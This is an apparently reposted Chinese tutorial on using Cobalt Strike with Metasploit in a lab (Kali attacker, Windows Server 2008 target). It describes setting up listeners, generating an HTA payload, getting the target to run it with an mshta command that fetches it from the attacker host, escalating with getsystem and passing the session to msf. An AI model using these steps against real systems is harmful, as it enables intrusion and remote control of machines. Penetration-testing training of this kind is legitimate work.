如何使用cobaltstrike接口传递msf中的shell


这篇文章主要介绍如何使用cobaltstrike接口传递msf中的shell,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。功能挺多,文章只是讲了工具的核心功能
渗透机:kali,靶机:ws08。kali:172.16.1.34
ws08:172.16.1.24agscript 拓展应用的脚本clint 检查profile的错误信息teamserver 服务端程序cobaltstrike 客户端程序cobaltstrike.jar(java跨平台)客户端logs 目录记录与目标主机的信息third-party 第三方工具启动服务器执行./teamserver 172.16.1.34 p@ssw0rd不要关闭窗口,然后本机启动cobalt strike连接测试客户端连接枚举用户用户通信/msg Ro0t xxxxxx上面是启动和操作方法,下面看下cobaltstrike监听模块Beacon为cs内置监听器,需要在目标机上执行相应的payload,获取shell到cs中。包含了smb,DNS, HTTP等模块=============================================================windows/beacon_http/reverse_dns_txtwindows/beacon_http/reverse_http x86/x64模块有很多,这里不列举了foreigh为与外部相结合的监听器,主要用于msf结合,比如获取meterpreter到shell中=============================================================在cobalt strike中添加一个Listener,创建beacon Listener创建Foreign Listenersave,在主配置菜单中依次点击,Attack,packages,HTML Application选择Listener生成与方法,有powershell,vba以及exe三种可执行文件选择ps,保存到桌面上、依次点击Attacks,webdirve-by,hostfile、通过web服务打开连接通道然后再弹出的窗口中找到文件一栏,点击文件夹按钮,找到需要添加的恶意脚本.hta、添加完后点击launch启动web服务模块此时我们查看日志信息提示我们在靶机客户端访问连链接回到靶机,打开终端使用命令mshta.exe http://172.16.1.34:80/download/file.txt命令kali查看,新连接已经建立起来了默认情况下此处链接有60s的心跳线,为避免流量过大可以适当调整间隔。右击会话选择interact打开交互会话终端可以查看下当前权限,可以使用getsystem提权试试。打开一个新的终端,进入msf设置一个监听载荷,lhost设置成本地ip免费云主机域名,然后expliit -j回到cobalt里,右击spawn生成新的listener。然后在弹出的窗口中点击add添加一个新监听器此时监听设置完,然后进入msf终端来传递cobaltstrike的shell回到msf可以发现已经和靶机建立起了会话以上是“如何使用cobaltstrike接口传递msf中的shell”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注云编程开发博客行业资讯频道!

相关推荐: 基于aes的加解密方案

对前端上送的报文进行解密和验签1、前端上送的报文先进行整体加密,然后把整体加密的数据作为encodeFieldVals的值;同时前端一起上送到后端的数据包括整体加密的aesKey前端请求后端的例子:http://127.0.0.1:8080/btoa/user…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/03 12:51
下一篇 02/03 12:51